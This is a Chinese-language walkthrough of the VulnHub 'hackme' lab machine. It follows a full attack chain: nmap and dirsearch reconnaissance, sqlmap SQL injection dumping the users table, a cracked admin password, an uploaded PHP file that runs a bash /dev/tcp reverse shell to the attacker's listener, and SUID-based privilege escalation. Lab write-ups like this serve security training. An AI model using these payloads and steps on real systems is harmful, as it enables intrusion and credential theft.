vulnhub系列:hackme
靶机下载
一、信息收集
nmap扫描存活,根据mac地址寻找IP
nmap 192.168.23.0/24
nmap扫描端口,开放端口:22、80
nmap 192.168.23.136 -sV -p- -Pn -O
访问80端口
dirsearch目录扫描
python3 dirsearch.py -u http://192.168.23.136
发现下图文件、目录
注册页面
文件页面
注册登录
搜索框抓包,数据包放到sqlmpa扫描,发现漏洞
sqlmap获取库名、表名、字段名,并将users表内容dump下来
--dbs
-D --tables
-D -T --columns
-D -T --dump
看到有个superadmin用户,md5解密superadmin用户密码
superadmin:Uncrackable
登录superadmin
上传php文件,文件内容
<?php phpinfo();?>
访问phpinfo文件,正常解析
二、getshell
上传反弹shell文件
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");?>
kali开启监听
nc -lvnp 4444
成功反弹shell
三、提权
查看当前权限,没有可利用的
查找suid 文件
find / -perm -u=s -type f 2>/dev/null
依次尝试,发现 /home/legacy/touchmenot可执行,提权成功
cd /home/legacy
./touchmenot
![【BUU】[NewStarCTF 2023 公开赛道]Final -CP读取文件内容](https://i-blog.csdnimg.cn/direct/a77443fb1b2c4ff29a47c73bbf8cfb90.png)
